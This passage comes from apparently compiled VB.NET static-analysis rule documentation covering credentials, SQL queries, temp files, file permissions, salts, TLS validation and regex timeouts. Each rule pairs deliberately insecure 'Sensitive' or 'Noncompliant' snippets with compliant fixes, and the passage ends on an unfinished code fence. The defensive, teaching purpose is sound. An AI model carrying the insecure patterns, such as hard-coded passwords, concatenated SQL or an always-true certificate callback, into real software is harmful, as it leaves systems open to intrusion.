            Dim consoleSettings As Microsoft.Extensions.Logging.Console.IConsoleLoggerSettings = Nothing
            Dim azureSettings As Microsoft.Extensions.Logging.AzureAppServices.AzureAppServicesDiagnosticsSettings = Nothing
            Dim eventLogSettings As Microsoft.Extensions.Logging.EventLog.EventLogSettings = Nothing

            ' An issue will be raised for each call to an ILoggerFactory extension methods adding loggers.
            loggerFactory.AddAzureWebAppDiagnostics() ' Sensitive
            loggerFactory.AddAzureWebAppDiagnostics(azureSettings) ' Sensitive
            loggerFactory.AddConsole() ' Sensitive
            loggerFactory.AddConsole(level) ' Sensitive
            loggerFactory.AddConsole(level, includeScopes) ' Sensitive
            loggerFactory.AddConsole(filter) ' Sensitive
            loggerFactory.AddConsole(filter, includeScopes) ' Sensitive
            loggerFactory.AddConsole(config) ' Sensitive
            loggerFactory.AddConsole(consoleSettings) ' Sensitive
            loggerFactory.AddDebug() ' Sensitive
            loggerFactory.AddDebug(level) ' Sensitive
            loggerFactory.AddDebug(filter) ' Sensitive
            loggerFactory.AddEventLog() ' Sensitive
            loggerFactory.AddEventLog(eventLogSettings) ' Sensitive
            loggerFactory.AddEventLog(level) ' Sensitive
            ' Only available for NET Standard 2.0 and above
            'loggerFactory.AddEventSourceLogger() ' Sensitive

            Dim providers As IEnumerable(Of ILoggerProvider) = Nothing
            Dim filterOptions1 As LoggerFilterOptions = Nothing
            Dim filterOptions2 As IOptionsMonitor(Of LoggerFilterOptions) = Nothing

            Dim factory As LoggerFactory = New LoggerFactory() ' Sensitive
            factory = New LoggerFactory(providers) ' Sensitive
            factory = New LoggerFactory(providers, filterOptions1) ' Sensitive
            factory = New LoggerFactory(providers, filterOptions2) ' Sensitive
        End Sub
    End Class
End Namespace

Log4Net

Imports System
Imports System.IO
Imports System.Xml
Imports log4net.Appender
Imports log4net.Config
Imports log4net.Repository

Namespace Logging
    Class Log4netLogging
        Private Sub Foo(ByVal repository As ILoggerRepository, ByVal element As XmlElement, ByVal configFile As FileInfo, ByVal configUri As Uri, ByVal configStream As Stream, ByVal appender As IAppender, ParamArray appenders As IAppender())
            log4net.Config.XmlConfigurator.Configure(repository) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, element) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configFile) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configUri) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configStream) ' Sensitive
            log4net.Config.XmlConfigurator.ConfigureAndWatch(repository, configFile) ' Sensitive

            log4net.Config.DOMConfigurator.Configure() ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(element) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, element) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(configFile) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configFile) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(configStream) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configStream) ' Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(configFile) ' Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(repository, configFile) ' Sensitive

            log4net.Config.BasicConfigurator.Configure() ' Sensitive
            log4net.Config.BasicConfigurator.Configure(appender) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(appenders) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appender) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appenders) ' Sensitive
        End Sub
    End Class
End Namespace

NLog: configure programmatically

Namespace Logging
    Class NLogLogging
        Private Sub Foo(ByVal config As NLog.Config.LoggingConfiguration)
            NLog.LogManager.Configuration = config ' Sensitive
        End Sub
    End Class
End Namespace

Serilog

Namespace Logging
    Class SerilogLogging
        Private Sub Foo()
            Dim config As Serilog.LoggerConfiguration = New Serilog.LoggerConfiguration() ' Sensitive
        End Sub
    End Class
End Namespace

See

vbnet:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, hard-coded credentials have led to several publicly documented vulnerabilities.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

Dim username As String = "admin"
Dim password As String = "Password123" ' Sensitive
Dim usernamePassword As String = "user=admin&password=Password123" ' Sensitive
Dim url As String = "scheme://user:Admin123@domain.com" ' Sensitive

Compliant Solution

Dim username As String = "admin"
Dim password As String = GetEncryptedPassword()
Dim usernamePassword As String = String.Format("user={0}&password={1}", GetEncryptedUsername(), GetEncryptedPassword())
Dim url As String = $"scheme://{username}:{password}@domain.com"

Dim url2 As String= "http://guest:guest@domain.com" ' Compliant
Const Password_Property As String = "custom.password" ' Compliant

Exceptions

  • Issue is not raised when URI username and password are the same.
  • Issue is not raised when searched pattern is found in variable name and value.

See

vbnet:S5693

Rejecting requests with a significant content length is a good practice: it limits network traffic intensity and resource consumption, helping to prevent DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • 8 MB or less for file uploads.
    • 2 MB or less for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

Imports Microsoft.AspNetCore.Mvc

Public Class MyController
    Inherits Controller

    <HttpPost>
    <DisableRequestSizeLimit> ' Sensitive: no size limit
    <RequestSizeLimit(10000000)> ' Sensitive: 10 MB is more than the recommended limit of 8 MB
    Public Function PostRequest(model As Model) As IActionResult
    ' ...
    End Function

    <HttpPost>
    <RequestFormLimits(MultipartBodyLengthLimit = 10000000)> ' Sensitive: 10 MB is more than the recommended limit of 8 MB
    Public Function MultipartFormRequest(model As Model) As IActionResult
    ' ...
    End Function

End Class

Compliant Solution

Imports Microsoft.AspNetCore.Mvc

Public Class MyController
    Inherits Controller

    <HttpPost>
    <RequestSizeLimit(8000000)> ' Compliant: 8MB
    Public Function PostRequest(model As Model) As IActionResult
    ' ...
    End Function

    <HttpPost>
    <RequestFormLimits(MultipartBodyLengthLimit = 8000000)> ' Compliant: 8MB
    Public Function MultipartFormRequest(model As Model) As IActionResult
    ' ...
    End Function

End Class

See

vbnet:S2077

Formatted SQL queries can be difficult to maintain and debug, and concatenating untrusted values into them increases the risk of SQL injection. Note that this rule does not detect SQL injection itself (unlike rule S3649); its goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid building SQL queries through concatenation or formatting; use parameterized queries, prepared statements, or stored procedures instead.

Sensitive Code Example

Public Sub SqlCommands(ByVal connection As SqlConnection, ByVal query As String, ByVal param As String)
    Dim sensitiveQuery As String = String.Concat(query, param)
    Dim command As New SqlCommand(sensitiveQuery) ' Sensitive

    command.CommandText = sensitiveQuery ' Sensitive

    Dim adapter As SqlDataAdapter
    adapter = New SqlDataAdapter(sensitiveQuery, connection) ' Sensitive
End Sub

Public Sub Foo(ByVal context As DbContext, ByVal query As String, ByVal param As String)
    Dim sensitiveQuery As String = String.Concat(query, param)
    context.Database.ExecuteSqlCommand(sensitiveQuery) ' Sensitive

    context.Query(Of User)().FromSql(sensitiveQuery) ' Sensitive
End Sub

Compliant Solution

Public Sub Foo(ByVal context As DbContext, ByVal value As String)
    context.Database.ExecuteSqlCommand("SELECT * FROM mytable WHERE mycol=@p0", value) ' Compliant, the query is parameterized
End Sub
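
For ADO.NET's SqlCommand, shown in the sensitive example above, the same parameterization applies. A minimal sketch (the table and column names are illustrative, reused from the compliant example):

```vbnet
Imports System.Data.SqlClient

Public Sub SafeSqlCommand(ByVal connection As SqlConnection, ByVal value As String)
    ' Compliant: the user-supplied value is bound as a parameter,
    ' never concatenated into the SQL text.
    Dim command As New SqlCommand("SELECT * FROM mytable WHERE mycol = @p0", connection)
    command.Parameters.AddWithValue("@p0", value)

    Using reader As SqlDataReader = command.ExecuteReader()
        ' ...
    End Using
End Sub
```

The parameter is transmitted separately from the query text, so the database never interprets the value as SQL.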

See

vbnet:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux-based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, this has led to several publicly documented vulnerabilities.

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see the list below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP, TMPDIR and TEMP.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP
  • %USERPROFILE%\AppData\Local\Temp

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Out of the box, .NET is missing secure-by-design APIs to create temporary files. To overcome this, one of the following options can be used:

  • Use a dedicated sub-folder with tightly controlled permissions
  • Create temporary files in a publicly writable folder and make sure:
    • Generated filename is unpredictable
    • File is readable and writable only by the creating user ID
    • File descriptor is not inherited by child processes
    • File is destroyed as soon as it is closed

Sensitive Code Example

Using Writer As New StreamWriter("/tmp/f") ' Sensitive
' ...
End Using
Dim Tmp As String = Environment.GetEnvironmentVariable("TMP") ' Sensitive

Compliant Solution

Dim RandomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName())

' Creates a new file with write, non inheritable permissions which is deleted on close.
Using FileStream As New FileStream(RandomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose)
    Using Writer As New StreamWriter(FileStream)
    ' ...
    End Using
End Using

See

vbnet:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

Imports System.IO

Sub Example()
    Dim TempPath = Path.GetTempFileName() 'Noncompliant

    Using Writer As New StreamWriter(TempPath)
        Writer.WriteLine("content")
    End Using
End Sub

Compliant solution

Imports System.IO

Sub Example()
    Dim RandomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName())

    Using FileStream As New FileStream(RandomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose)
        Using Writer As New StreamWriter(FileStream)
            Writer.WriteLine("content")
        End Using
    End Using
End Sub

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Strong security controls

Temporary files can be created using unsafe functions and APIs as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers cannot create a file before them. This translates into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Here, the compliant example uses the Path.GetTempPath and Path.GetRandomFileName functions to generate a unique, random file name. The file is then opened with the FileMode.CreateNew option, which ensures creation fails if the file already exists. The FileShare.None option additionally prevents the file from being opened again by any other process. Finally, the FileOptions.DeleteOnClose option ensures the file is destroyed once the application has finished using it.

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
vbnet:S2612

In Unix, "others" class refers to all users except the owner of the file and the members of the group assigned to this file.

In Windows, "Everyone" group is similar and includes all members of the Authenticated Users group as well as the built-in Guest account, and several other built-in security accounts.

Granting permissions to these groups can lead to unintended access to files.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

.Net Framework

Dim unsafeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Allow)

Dim fileSecurity = File.GetAccessControl("path")
fileSecurity.AddAccessRule(unsafeAccessRule) ' Sensitive
fileSecurity.SetAccessRule(unsafeAccessRule) ' Sensitive
File.SetAccessControl("fileName", fileSecurity)

.Net / .Net Core

Dim fileInfo = new FileInfo("path")
Dim fileSecurity = fileInfo.GetAccessControl()

fileSecurity.AddAccessRule(new FileSystemAccessRule("Everyone", FileSystemRights.Write, AccessControlType.Allow)) ' Sensitive
fileInfo.SetAccessControl(fileSecurity)

.Net / .Net Core using Mono.Posix.NETStandard

Dim fileSystemEntry = UnixFileSystemInfo.GetFileSystemEntry("path")
fileSystemEntry.FileAccessPermissions = FileAccessPermissions.OtherReadWriteExecute ' Sensitive

Compliant Solution

.Net Framework

Dim safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny)

Dim fileSecurity = File.GetAccessControl("path")
fileSecurity.AddAccessRule(safeAccessRule)
File.SetAccessControl("path", fileSecurity)

.Net / .Net Core

Dim safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny)

Dim fileInfo = new FileInfo("path")
Dim fileSecurity = fileInfo.GetAccessControl()
fileSecurity.SetAccessRule(safeAccessRule)
fileInfo.SetAccessControl(fileSecurity)

.Net / .Net Core using Mono.Posix.NETStandard

Dim fs = UnixFileSystemInfo.GetFileSystemEntry("path")
fs.FileAccessPermissions = FileAccessPermissions.UserExecute

See

vbnet:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' password-and-salt pairs depends on the salt size: the shorter the salt, the higher the collision probability. In any case, a longer, cryptographically secure salt should be preferred.

How to fix it in .NET

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

Imports System.Security.Cryptography

Public Sub Hash(Password As String)
    Dim Salt As Byte() = Encoding.UTF8.GetBytes("salty")
    Dim Hashed As New Rfc2898DeriveBytes(Password, Salt) ' Noncompliant
End Sub

Compliant solution

Imports System.Security.Cryptography

Public Sub Hash(Password As String)
    Dim Hashed As New Rfc2898DeriveBytes(Password, 64)
End Sub

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

In the case of the code sample, the class automatically takes care of generating a secure salt if none is specified.
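
If a salt must be supplied explicitly, for example to store it alongside the hash, it can be generated with a cryptographically secure random generator. A minimal sketch, assuming the 16-byte (128-bit) length recommended above:

```vbnet
Imports System.Security.Cryptography

Public Sub HashWithExplicitSalt(Password As String)
    ' Generate a unique, unpredictable 16-byte (128-bit) salt per user.
    Dim Salt(15) As Byte
    Using Rng As RandomNumberGenerator = RandomNumberGenerator.Create()
        Rng.GetBytes(Salt)
    End Using

    ' Compliant: the salt is random, unique, and long enough.
    Dim Hashed As New Rfc2898DeriveBytes(Password, Salt)
End Sub
```

The salt can then be persisted next to the resulting hash, since it does not need to remain secret, only unpredictable.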

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
vbnet:S1313

Hardcoding IP addresses is security-sensitive. It has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It encourages using the same address in every environment (dev, sys, qa, prod).

Last but not least, it affects application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address fixing the issue takes longer, which increases the attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

Dim ip = "192.168.12.42" ' Sensitive
Dim address = IPAddress.Parse(ip)

Compliant Solution

Dim ip = ConfigurationManager.AppSettings("myapplication.ip") ' Compliant
Dim address = IPAddress.Parse(ip)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

vbnet:S6444

Not specifying a timeout for regular expressions can lead to a Denial-of-Service attack. Pass a timeout when using System.Text.RegularExpressions to process untrusted input because a malicious user might craft a value for which the evaluation lasts excessively long.

Ask Yourself Whether

  • the input passed to the regular expression is untrusted.
  • the regular expression contains patterns vulnerable to catastrophic backtracking.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to specify a matchTimeout when executing a regular expression.
  • Make sure regular expressions are not vulnerable to Denial-of-Service attacks by reviewing the patterns.
  • Consider using a non-backtracking algorithm by specifying RegexOptions.NonBacktracking.

Sensitive Code Example

Public Sub RegexPattern(Input As String)
    Dim EmailPattern As New Regex(".+@.+", RegexOptions.None)
    Dim IsNumber As Boolean = Regex.IsMatch(Input, "[0-9]+")
    Dim IsLetterA As Boolean = Regex.IsMatch(Input, "(a+)+")
End Sub

Compliant Solution

Public Sub RegexPattern(Input As String)
    Dim EmailPattern As New Regex(".+@.+", RegexOptions.None, TimeSpan.FromMilliseconds(100))
    Dim IsNumber As Boolean = Regex.IsMatch(Input, "[0-9]+", RegexOptions.None, TimeSpan.FromMilliseconds(100))
    Dim IsLetterA As Boolean = Regex.IsMatch(Input, "(a+)+", RegexOptions.NonBacktracking) '.Net 7 And above
    AppDomain.CurrentDomain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromMilliseconds(100)) 'process-wide setting
End Sub

See

vbnet:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led to vulnerabilities in the past.

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.
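
As a sketch of such sanitization, assuming the program expects a bounded numeric value (the range below is illustrative), the input can be validated before use:

```vbnet
Imports System

Public Class ValidatedInput
    Public Sub Main()
        Dim Line As String = Console.ReadLine() ' Still flagged by the rule; the value is validated below.
        Dim Count As Integer
        ' Reject anything that is not an integer in the expected range.
        If Integer.TryParse(Line, Count) AndAlso Count >= 0 AndAlso Count <= 100 Then
            Console.WriteLine(Count)
        Else
            Console.Error.WriteLine("Invalid input")
        End If
    End Sub
End Class
```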

Sensitive Code Example

Imports System
Public Class C
    Public Sub Main()
        Dim x = Console.[In] ' Sensitive
        Console.Read() ' Sensitive
        Console.ReadKey() ' Sensitive
        Console.ReadLine() ' Sensitive
        Console.OpenStandardInput() ' Sensitive
    End Sub
End Class

Exceptions

This rule does not raise issues when the return value of the Console.Read, Console.ReadKey, or Console.ReadLine methods is ignored.

Imports System

Public Class C
    Public Sub Main()
        Console.ReadKey() ' Return value is ignored
        Console.ReadLine() ' Return value is ignored
    End Sub
End Class

See

vbnet:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led to vulnerabilities in the past.

Command line arguments can be dangerous just like any other user input. They should never be used without first being validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered insecure.

This rule raises an issue on every program entry point (Main method) where command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing it on the command line. It is common to write it to the process’s standard input, or to pass the path to a file containing the information.
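
For example, instead of passing a secret directly on the command line, the argument can carry only the path to a file that holds it. A hypothetical sketch:

```vbnet
Imports System
Imports System.IO

Module Program
    Sub Main(args As String()) ' The rule still flags "args"; the point is what the arguments carry.
        ' args(0) is a file path, not the secret itself, so the secret
        ' never appears in the system's process list.
        Dim SecretPath As String = args(0)
        Dim Secret As String = File.ReadAllText(SecretPath).Trim()
        ' ... use Secret, e.g. to open a connection ...
    End Sub
End Module
```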

Sensitive Code Example

Module Program
    Sub Main(args As String()) ' Sensitive as there is a reference to "args" in the procedure.
        Console.WriteLine(args(0))
    End Sub
End Module

See

vbnet:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in .NET

Code examples

In the following example, the callback change affects all HTTP requests made by the application.

Certificate validation is disabled by overriding ServerCertificateValidationCallback with a callback that unconditionally returns True. It is highly recommended to keep the default validation.

Noncompliant code example

Imports System.Net

Public Sub Send()
    ServicePointManager.ServerCertificateValidationCallback =
        Function(sender, certificate, chain, errors) True ' Noncompliant

    Dim request As System.Net.HttpWebRequest = CType(System.Net.WebRequest.Create(New System.Uri("https://example.com")), System.Net.HttpWebRequest)
    request.Method = System.Net.WebRequestMethods.Http.Get
    Dim response As System.Net.HttpWebResponse = CType(request.GetResponse(), System.Net.HttpWebResponse)
    response.Close()
End Sub

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.
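
If adding the certificate to the trust store is not an option, the callback can validate against the one expected certificate instead of accepting everything. A sketch of this pinning approach, assuming the expected certificate's thumbprint is known in advance (the constant below is a placeholder):

```vbnet
Imports System
Imports System.Net
Imports System.Net.Security
Imports System.Security.Cryptography.X509Certificates

Public Module PinnedValidation
    ' Placeholder: replace with the real thumbprint of the expected certificate.
    Private Const ExpectedThumbprint As String = "0000000000000000000000000000000000000000"

    Public Sub Configure()
        ServicePointManager.ServerCertificateValidationCallback =
            Function(sender, certificate, chain, errors)
                ' Accept a chain that validated normally, or the one known
                ' self-signed certificate, identified by its thumbprint.
                If errors = SslPolicyErrors.None Then Return True
                Dim Cert As New X509Certificate2(certificate)
                Return String.Equals(Cert.Thumbprint, ExpectedThumbprint, StringComparison.OrdinalIgnoreCase)
            End Function
    End Sub
End Module
```

Unlike the noncompliant callback, this variant keeps rejecting every certificate except the single pinned one.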

Resources

Standards

vbnet:S4036

When executing an OS command, unless you specify the full path to the executable, the directories listed in your application’s PATH environment variable are searched for it. That search leaves an opening for an attacker if one of the directories in PATH is under their control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by untrusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

Dim p As New Process()
p.StartInfo.FileName = "binary" ' Sensitive

Compliant Solution

Dim p As New Process()
p.StartInfo.FileName = "C:\Apps\binary.exe" ' Compliant

See

vbnet:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented to restrict access to resources to authorized entities; otherwise, vulnerabilities can result.

Granting correct permissions to users, applications, groups, or roles, and defining the permissions required to access a resource, is sensitive and must therefore be done with care. For instance, it is obvious that only users with administrator privileges should be authorized to add or remove the administrator permission of another user.

Ask Yourself Whether

  • Permissions granted to an entity (user, application) allow access to information or functionalities not needed by that entity.
  • Privileges are easily acquired (e.g., based on the location of the user or the type of device used, defined by third parties, not requiring approval).
  • An entity with inherited permissions, default permissions, or no privileges (e.g., an anonymous user) is authorized to access a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Review entities' permissions regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only to the information and resources that are necessary for its legitimate purpose").
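A well-defined model keeps the permission logic in one place and defaults to "deny". A minimal RBAC sketch in JavaScript (role names and permissions are hypothetical, for illustration only):

```javascript
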